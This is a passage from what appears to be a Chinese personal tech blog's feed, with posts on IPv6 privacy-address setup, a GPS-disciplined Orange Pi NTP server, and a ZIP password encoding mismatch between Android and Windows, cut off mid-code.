src="/pictures/canokey-canary/11.png"> </p><p>别人收到以后是这么一个效果:<br><img src="/pictures/canokey-canary/12.png"> </p>]]></content>
<summary type="html"><h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h3><p>第一次接触Canokey还是在2021年,当时跟风买了CanoKey Pigeon首发,到手以后把GPG密钥塞进去再加到几个网站做认证器以后就一直是半吃灰状态,毕竟网站的登录不会天天掉,而GPG更是一万年没人给我发加密的信息,连用来git签名的次数都少(我懒)。 </p>
<p>前段Canokey群抽奖送Canary测试版,本人有幸中得一个:<br><img src="/pictures/canokey-canary/1.png"> </p>
<p>那这不再折腾一下似乎就有点不合适了。 </p>
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>硬件信息:<br>&emsp;&emsp;CanoKey Canary(3.0.0-rc2-0 dirty build)<br>操作系统:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>软件版本:<br>&emsp;&emsp;gpg4win 4.4 (gpg 2.4.7)<br>&emsp;&emsp;OpenSC 0.26.0 </p></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>在2024年配置IPv6是什么怎样一种体验</title>
<link href="https://thinkalone.win/ipv6-in-2024.html"/>
<id>https://thinkalone.win/ipv6-in-2024.html</id>
<published>2024-09-01T04:00:00.000Z</published>
<updated>2024-09-15T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="Do-not-手欠"><a href="#Do-not-手欠" class="headerlink" title="Do not 手欠"></a>Do not 手欠</h3><p>前段时间给宽带改了个套餐,公网IPv4没了,要也不给了,被迫开始转IPv6。</p><hr><h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h3><p>主路由:<br>  ImmortalWrt 21.02<br>系统:<br>  Windows 10 LTSB 21H2<br>  Debian 12(bookworm)<br>  Ubuntu 22.04 LTS(jammy)<br>ISP:<br>  中国电信(DHCPv6-PD) </p><span id="more"></span> <h3 id="配置目标"><a href="#配置目标" class="headerlink" title="配置目标"></a>配置目标</h3><p>让需要提供服务的设备获取到稳定的隐私地址,即:<br>1.不使用eui64(防止通过IPv6 SLAAC 地址反推客户端 MAC)。<br>2.地址要尽量固定,方便写防火墙规则。 </p><h3 id="路由配置"><a href="#路由配置" class="headerlink" title="路由配置"></a>路由配置</h3><p>ImmortalWrt默认情况下直接拨号就会自动创建一个WAN6虚拟接口,可以说是十分的省心了。<br>修改配置如图所示:<br>租期改为12小时<br><img src="/pictures/ipv6-in-2024/1.png"><br>分配长度/64,eui64方式生成路由的地址<br><img src="/pictures/ipv6-in-2024/2.png"><br>手动设置通告的DNS,不使用运营商的<br><img src="/pictures/ipv6-in-2024/3.png"><br>开启SLAAC,配置M、O标签<br><img src="/pictures/ipv6-in-2024/4.png"> </p><p>这里的配置同时开启了Stateless(SLAAC)和Stateful(DHCPv6) </p><p>目前:<br>  安卓设备只支持Stateless方式获取IPv6地址<br>  类Debian系统对Stateless和Stateful的支持都相对完善<br>  Windows系统(Window 10 21H2)对Stateless的支持相对完善,对Stateful的支持有问题 </p><p>所以你完全可以<a href="https://github.com/immortalwrt/user-FAQ/blob/main/immortalwrt%20%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98%E6%8C%87%E5%8C%97.md">按教程只使用Stateless</a>,我同时开纯粹是没事找事。 </p><h3 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h3><p>Ubuntu 20+版本默认使用Netplan管理网络 </p><figure class="highlight yaml"><figcaption><span>/etc/netplan/00-default-config.yaml</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">network:</span></span><br><span class="line"> <span class="attr">version:</span> <span class="number">2</span></span><br><span class="line"> <span class="attr">renderer:</span> <span class="string">networkd</span></span><br><span class="line"> <span class="attr">ethernets:</span></span><br><span class="line"> <span class="attr">enp2s0:</span></span><br><span class="line"> <span class="attr">dhcp4:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">dhcp6:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">ipv6-privacy:</span> <span class="literal">false</span></span><br><span class="line"> <span class="attr">ipv6-address-token:</span> <span class="string">::dead:beef:114:514</span></span><br><span class="line"> <span class="comment"># 这里的token可以自己随意改,只要符合规范就好</span></span><br><span class="line"> <span class="comment"># 以这个token为例,假设ISP给的PD前缀是240e:1234:4567:9100::/64 </span></span><br><span class="line"> <span class="comment"># 虽然中国电信一般都是给/56,但是前面在路由的设置里改成了/64,中间隔开两个0地址好看一些 </span></span><br><span class="line"> <span class="comment"># 那么最终的地址会是240e:1234:4567:9100:dead:beef:114:514</span></span><br><span class="line"> </span><br></pre></td></tr></table></figure><h3 id="Debian"><a href="#Debian" class="headerlink" title="Debian"></a>Debian</h3><p>首先配置让networkd来管理网络 </p><figure class="highlight bash"><figcaption><span>Bash</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mv</span> /etc/network/interfaces /etc/network/interfaces.save </span><br><span class="line"><span class="built_in">mv</span> /etc/network/interfaces.d /etc/network/interfaces.d.save </span><br><span class="line"></span><br><span class="line">systemctl <span class="built_in">enable</span> systemd-networkd.service </span><br><span class="line">systemctl start systemd-networkd.service </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><figcaption><span>/etc/systemd/network/default.network</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[Match]</span><br><span class="line">Name=eth0</span><br><span class="line"></span><br><span class="line">[Network]</span><br><span class="line">DHCP=yes</span><br><span class="line">IPv6AcceptRA=yes</span><br><span class="line">IPv6PrivacyExtensions=no</span><br><span class="line"></span><br><span class="line">[IPv6AcceptRA]</span><br><span class="line">Token=::dead:beef:114:514</span><br><span class="line"># token部分解释同上</span><br></pre></td></tr></table></figure><h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p>Update: Window在这里纯属特例,它既没有RFC 7217支持,也没有token支持(至少Window 10 21H2完全没有)<br>所以这里被迫使用eui64,同时为了隐私保护更改掉原始的MAC地址 </p><p>以管理员启动Powershell: </p><figure class="highlight powershell"><figcaption><span>Powershell</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Set-NetIPv6Protocol</span> <span class="literal">-RandomizeIdentifiers</span> Disabled</span><br><span class="line"><span class="comment"># 关闭随机地址生成</span></span><br><span class="line"><span class="comment"># 这一项设置为Enabled时Windows使用eui64</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">Set-NetIPv6Protocol</span> <span class="literal">-UseTemporaryAddresses</span> Disabled</span><br><span class="line"><span class="comment"># 禁止Windows使用隐私地址(RFC 4941)</span></span><br></pre></td></tr></table></figure><h3 id="解释部分"><a href="#解释部分" class="headerlink" title="解释部分"></a>解释部分</h3><p>这样配置下来以后,每个设备理论上能获得两组IPV6地址,一个SLAAC来的,一个DHCP V6分的,<br>中国电信每过几天就会把拨号断开重连导致PD前缀变化,由于SLAAC得到的地址会很快的更新,在所有系统上也都会很快的恢复连接。<br>DHCP V6就不一定了,我将租期设置为了12小时,类Debian系统每过12小时都会重新向DHCP服务器要地址,这很好。<br>但是Windows不会,无论我怎么更改设置,Windows总能给我整出来一个三天租期的花活,<br>然后因为前缀变化,原来的地址失效无法访问了,Windows就会自己整出来一个新的隐私地址用进而导致防火墙规则失效。<br>当然,本文中介绍的方法不是RFC 7217,需要RFC 7217请查看参考资料,反正我是感觉7217出来的地址太长还不好看。 </p><h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p><a href="https://wiki.archlinuxcn.org/wiki/Systemd-networkd">https://wiki.archlinuxcn.org/wiki/Systemd-networkd</a></p><p><a href="https://wiki.archlinuxcn.org/wiki/IPv6#%E7%A8%B3%E5%AE%9A%E7%9A%84%E9%9A%90%E7%A7%81%E5%9C%B0%E5%9D%80">https://wiki.archlinuxcn.org/wiki/IPv6#%E7%A8%B3%E5%AE%9A%E7%9A%84%E9%9A%90%E7%A7%81%E5%9C%B0%E5%9D%80</a></p><p><a href="https://wiki.debian.org/SystemdNetworkd">https://wiki.debian.org/SystemdNetworkd</a></p>]]></content>
<summary type="html"><h3 id="Do-not-手欠"><a href="#Do-not-手欠" class="headerlink" title="Do not 手欠"></a>Do not 手欠</h3><p>前段时间给宽带改了个套餐,公网IPv4没了,要也不给了,被迫开始转IPv6。</p>
<hr>
<h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h3><p>主路由:<br>&emsp;&emsp;ImmortalWrt 21.02<br>系统:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>&emsp;&emsp;Debian 12(bookworm)<br>&emsp;&emsp;Ubuntu 22.04 LTS(jammy)<br>ISP:<br>&emsp;&emsp;中国电信(DHCPv6-PD) </p></summary>
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>用 Orange Pi Zero 搭建一台 Stratum 1 的 NTP 服务器</title>
<link href="https://thinkalone.win/orangepi-zero-ntp.html"/>
<id>https://thinkalone.win/orangepi-zero-ntp.html</id>
<published>2024-07-11T04:00:00.000Z</published>
<updated>2025-09-10T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>首先:这个东西有什么用?<br>答:<strong>没有任何用处,但是能让你内网的设备时间精度达到亚毫秒级</strong> </p><p><img src="/pictures/orangepi-zero-ntp/1.png" alt="time.is"> </p><p>当然,不要以这个网页为参考,实际误差要远远低于显示: </p><p><img src="/pictures/orangepi-zero-ntp/2.png" alt="chronyc sources"> </p><p>实际应该是几个微秒的误差。 </p><hr><span id="more"></span> <h3 id="材料准备"><a href="#材料准备" class="headerlink" title="材料准备"></a>材料准备</h3><blockquote><ol><li>Orange Pi Zero LTS 一个<br> 也就是初代的Orange Pi Zero,理论上Zero2、3也可以,但是需要根据实际接线情况修改配置</li><li>ATGM336H GPS模块 一个<br> 可替换,只要带PPS输出的就行,我选这个型号是因为他是ipex接口可以外接天线<br> 2.1 GPS天线(3.3v供电) 一个<br> 2.2 SMA转IPEX射频转接线 一条</li><li>DS3231 实时时钟模块 一个<br> DS3231M也可以,这里只是用作掉电后的时间备份,精度不太重要</li><li>2*13双排26P 2.54杜邦插头双排端子线 一个<br> 用于优雅的连接到Orange Pi的26P GPIO接口</li></ol></blockquote><p>其他电子配件不再赘述 </p><h3 id="硬件配置"><a href="#硬件配置" class="headerlink" title="硬件配置"></a>硬件配置</h3><h4 id="GPS模块"><a href="#GPS模块" class="headerlink" title="GPS模块"></a>GPS模块</h4><p>使用USB-TTL板将模块连接到电脑,使用对应的工具将GPS模块的串口波特率调整到115200(模块一般默认为9600,过低,时间报文传输时间太长,会导致延迟过高)<br>我使用的ATGM336H模块可以用<a href="https://github.com/zxcwhale/GnssToolKit3-binaries/releases">GnssToolKit3</a>进行配置<br>其他模块可以参考手册进行配置 </p><h4 id="DS3231模块"><a href="#DS3231模块" class="headerlink" title="DS3231模块"></a>DS3231模块</h4><p>如果你使用的是同款模块(大概率),使用烙铁拆焊掉这里的电阻以防止VCC倒灌进入电池<br><img src="/pictures/orangepi-zero-ntp/3.png" alt="DS3231"> </p><h4 id="接线图"><a href="#接线图" class="headerlink" title="接线图"></a>接线图</h4><p><img src="/pictures/orangepi-zero-ntp/4.png" alt="接线图"> </p><h3 id="系统配置"><a href="#系统配置" class="headerlink" title="系统配置"></a>系统配置</h3><p>参考:<a href="https://github.com/moonbuggy/Orange-Pi-Zero-GPS-NTP">https://github.com/moonbuggy/Orange-Pi-Zero-GPS-NTP</a><br>下载对应的<a href="https://www.armbian.com/orange-pi-zero/">armbian</a>系统并将系统安装到TF卡<br>系统初始化完成后,使用<code>armbian-config</code>工具,进入<code>System => Hardware</code>启用<code>i2c0, pps-gpio, uart2</code><br>运行命令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo sh -c "echo 'param_pps_pin=PA3' >> /boot/armbianEnv.txt"</span><br></pre></td></tr></table></figure><p>指定PA3为PPS输入 </p><p>更新:使用Orange Pi Zero3时,armbian可能没有带pps的dts,可以手动创建一个,和ds3231的dts一样安装: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">/dts-v1/;</span><br><span class="line">/plugin/;</span><br><span class="line"></span><br><span class="line">/ {</span><br><span class="line"> compatible = "allwinner,sun50i-h616";</span><br><span class="line"></span><br><span class="line"> fragment@0 {</span><br><span class="line"> target = <&pio>;</span><br><span class="line"> __overlay__ {</span><br><span class="line"> pps_pins: pps_pins {</span><br><span class="line"> pins = "PC11";</span><br><span class="line"> function = "pps";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> fragment@1 {</span><br><span class="line"> target-path = "/";</span><br><span class="line"> __overlay__ {</span><br><span class="line"> pps@0 {</span><br><span class="line"> compatible = "pps-gpio";</span><br><span class="line"> pinctrl-names = "default";</span><br><span class="line"> pinctrl-0 = <&pps_pins>;</span><br><span class="line"> gpios = <&pio 2 11 0>; /* PC11 */</span><br><span class="line"> status = "okay";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">};</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>新建文件<code>ds3231.dts</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">/dts-v1/;</span><br><span class="line">/plugin/;</span><br><span class="line"></span><br><span class="line">/ {</span><br><span class="line"> compatible = "xunlong,orangepi-zero", "allwinner,sun8i-h2-plus";</span><br><span class="line"></span><br><span class="line"> fragment@0 {</span><br><span class="line"> target-path = "/aliases";</span><br><span class="line"></span><br><span class="line"> __overlay__ {</span><br><span class="line"> rtc0 = "/soc/i2c@1c2b400/ds3231";</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> fragment@1 {</span><br><span class="line"> target-path = "/soc/i2c@1c2b400";</span><br><span class="line"></span><br><span class="line"> __overlay__ {</span><br><span class="line"> ds3231: rtc@68 {</span><br><span class="line"> compatible = "maxim,ds3231";</span><br><span class="line"> reg = <0x68>;</span><br><span class="line"> #clock-cells = <1>;</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>运行命令 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo armbian-add-overlay ds3231.dts</span><br></pre></td></tr></table></figure><p>启用DS3231的DTS</p><h3 id="软件配置"><a href="#软件配置" class="headerlink" title="软件配置"></a>软件配置</h3><h4 id="配置gpsd"><a href="#配置gpsd" class="headerlink" title="配置gpsd"></a>配置<code>gpsd</code></h4><p>安装 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install gpsd gpsd-tools pps-tools i2c-tools</span><br></pre></td></tr></table></figure><p>修改配置文件<code>/etc/default/gpsd</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># Devices gpsd should connect to at boot time.</span><br><span class="line"># They need to be read/writeable, either by user gpsd or the group dialout.</span><br><span class="line">DEVICES="/dev/ttyS2 /dev/pps0"</span><br><span class="line"></span><br><span class="line"># Other options you want to pass to gpsd</span><br><span class="line">GPSD_OPTIONS="-n -s 115200"</span><br><span class="line"></span><br><span class="line"># Automatically hot add/remove USB GPS devices via gpsdctl</span><br><span class="line">USBAUTO="true"</span><br><span class="line"></span><br><span class="line">/bin/stty -F /dev/ttyS2 115200</span><br><span class="line">/bin/setserial /dev/ttyS2 low_latency</span><br></pre></td></tr></table></figure><p>运行命令启动<code>gpsd</code>服务: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl daemon-reload</span><br><span class="line">sudo systemctl enable gpsd</span><br><span class="line">sudo systemctl start gpsd</span><br></pre></td></tr></table></figure><p>运行<code>gpsmon</code>查看是否有输出,如配置正确应该可以看到NMEA报文,位置,卫星数等信息<br>手动调整天线的位置、角度,尽量靠窗,让可见卫星数尽可能的多,使定位误差尽可能的小<br><img src="/pictures/orangepi-zero-ntp/5.png" alt="gpsmon"> </p><h4 id="配置chrony"><a href="#配置chrony" class="headerlink" title="配置chrony"></a>配置<code>chrony</code></h4><p>安装: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install chrony</span><br></pre></td></tr></table></figure><p>创建配置文件<code>/etc/chrony/conf.d/gpsd.conf</code>: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">refclock SHM 0 precision 1e-1 offset 0.0 delay 0.2 refid NMEA noselect</span><br><span class="line">refclock PPS /dev/pps0 lock NMEA refid PPS maxlockage 32 prefer</span><br></pre></td></tr></table></figure><p>修改配置文件<code>/etc/default/chrony</code> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># This is a configuration file for /etc/init.d/chrony and</span><br><span class="line"># /lib/systemd/system/chrony.service; it allows you to pass various options to</span><br><span class="line"># the chrony daemon without editing the init script or service file.</span><br><span class="line"></span><br><span class="line"># Options to pass to chrony.</span><br><span class="line">DAEMON_OPTS="-F 1 -r -m -s"</span><br></pre></td></tr></table></figure><p>配置DS3231: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># E̅O̅S̅C̅</span><br><span class="line">i2cset -y 0 0x68 0x0e 0x1c</span><br><span class="line"></span><br><span class="line"># OSF</span><br><span class="line">i2cset -y 0 0x68 0x0f 0x08</span><br><span class="line"></span><br><span class="line"># 设置时间</span><br><span class="line">sudo hwclock -w -f /dev/rtc</span><br><span class="line"></span><br><span class="line"># 读取时间</span><br><span class="line">sudo hwclock -r -f /dev/rtc</span><br></pre></td></tr></table></figure><h3 id="杂项与微调"><a href="#杂项与微调" class="headerlink" title="杂项与微调"></a>杂项与微调</h3><h4 id="配置上游NTP-server"><a href="#配置上游NTP-server" class="headerlink" title="配置上游NTP server"></a>配置上游NTP server</h4><p>使用就近的NTP server<br>将配置文件<code>/etc/chrony/chrony.conf</code>中原来的pool/server部分修改如下: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">server 0.cn.pool.ntp.org iburst</span><br><span class="line">server 1.cn.pool.ntp.org iburst</span><br><span class="line">server 2.cn.pool.ntp.org iburst</span><br><span class="line">server 3.cn.pool.ntp.org iburst</span><br></pre></td></tr></table></figure><h4 id="offset整定"><a href="#offset整定" class="headerlink" title="offset整定"></a>offset整定</h4><p>前文在配置文件<code>/etc/chrony/conf.d/gpsd.conf</code>中,暂时将<code>offset</code>设置为了<code>0.0</code>,在chrony服务正常运行半小时后,运行命令: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chronyc sourcestats</span><br></pre></td></tr></table></figure><p>查看<code>NMEA</code>项的<code>Offset</code>部分: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Name/IP Address NP NR Span Frequency Freq Skew Offset Std Dev</span><br><span class="line">==============================================================================</span><br><span class="line">NMEA 7 3 95 -134.817 741.206 +4490us 9095us</span><br><span class="line">PPS 39 26 608 -0.000 0.008 -1ns 2553ns</span><br><span class="line">......</span><br></pre></td></tr></table></figure><p>将<code>Offset</code>的数值转化为秒,填入配置文件中,重启chrony<br>我的数值已经整定过了,所以只有几毫秒,未整定情况下一般会在±0.2秒。<br>offset值不应超过±0.45秒。</p><h4 id="开启chrony的服务器模式"><a href="#开启chrony的服务器模式" class="headerlink" title="开启chrony的服务器模式"></a>开启chrony的服务器模式</h4><p>在配置文件<code>/etc/chrony/chrony.conf</code>末尾,加一行: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">allow</span><br></pre></td></tr></table></figure><p>现在chrony已经可以被局域网内的设备访问到了,将服务器地址设为chrony的IP后同步时间,然后就可以截图去炫耀了。 </p>]]></content>
<summary type="html"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>首先:这个东西有什么用?<br>答:<strong>没有任何用处,但是能让你内网的设备时间精度达到亚毫秒级</strong> </p>
<p><img src="/pictures/orangepi-zero-ntp/1.png" alt="time.is"> </p>
<p>当然,不要以这个网页为参考,实际误差要远远低于显示: </p>
<p><img src="/pictures/orangepi-zero-ntp/2.png" alt="chronyc sources"> </p>
<p>实际应该是几个微秒的误差。 </p>
<hr></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>难绷的Zip与中文密码</title>
<link href="https://thinkalone.win/chinese-zip-password.html"/>
<id>https://thinkalone.win/chinese-zip-password.html</id>
<published>2024-03-01T04:00:00.000Z</published>
<updated>2024-03-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h3><p><strong>某天,我的朋友在QQ上转发给我了一个带密码的Zip压缩包</strong><br><img src="/pictures/chinese-zip-password/1.png"></p><p>我看了一眼,双击后默认用WinRAR打开了,然后复制粘贴密码:<br><img src="/pictures/chinese-zip-password/2.png"></p><p>啊?密码错误?</p><hr><span id="more"></span> <p>我第一反应当然是怀疑是不是对面冲多了手滑,在输密码的时候不小心多打了点什么进去,但是经过我们10分钟的友好交流后,他确定以及肯定自己绝对没有手滑,还把传给我的压缩包重新下载下来 <strong>在手机上</strong> 把密码粘贴进去成功解压了。</p><p>我当时眉头一紧,立马感觉到自己似乎站到了坑的边缘。</p><h3 id="试图复现:"><a href="#试图复现:" class="headerlink" title="试图复现:"></a>试图复现:</h3><p>这里以我常用的文件管理器MiXplorer为例:<br>新建一个Zip压缩包,密码这里MiXplorer正常情况下只允许输入英文+数字,但我们可以直接把中文密码粘贴进去:<br><img src="/pictures/chinese-zip-password/3.jpg"></p><p>然后在手机上测试解压:<br><img src="/pictures/chinese-zip-password/4.jpg"><br><img src="/pictures/chinese-zip-password/5.jpg"><br>显然,是可以正常解压的,然后我们把这个压缩包传到电脑上(Win10)再次进行尝试:<br><img src="/pictures/chinese-zip-password/6.png"><br><img src="/pictures/chinese-zip-password/7.png"> </p><h3 id="原因分析:"><a href="#原因分析:" class="headerlink" title="原因分析:"></a>原因分析:</h3><p>不用多想,一定是编码的问题,但我很好奇,为什么会这样?以及原来的密码究竟被编码成了什么?</p><p>首先,我们Google搜索<code>java zip 中文密码</code>,通过查找可以得知一个包:<a href="https://github.com/srikanth-lingala/zip4j">zip4j</a><br>然后我们写一小段代码来试着解压它:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> net.lingala.zip4j.ZipFile;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Throwable {</span><br><span class="line"><span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">"测试"</span>;</span><br><span class="line"><span class="type">ZipFile</span> <span class="variable">zipFile</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZipFile</span>(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\27.zip"</span>);</span><br><span class="line">zipFile.setPassword(password.toCharArray());</span><br><span class="line">zipFile.extractAll(<span class="string">"D:\\Work\\Temp\\chinese-zip-password\\d"</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>运行,直接报错: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Exception in thread "main" net.lingala.zip4j.exception.ZipException: Wrong password!</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>搜索得知安卓默认中文编码是UTF-8,然后在翻阅zip4j的文档,可以发现这样一个方法:<a href="https://javadoc.io/static/net.lingala.zip4j/zip4j/2.11.5/net/lingala/zip4j/ZipFile.html#setUseUtf8CharsetForPasswords(boolean)">setUseUtf8CharsetForPasswords</a> 我们修改代码如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> net.lingala.zip4j.ZipFile;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UnZip</span> {</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title 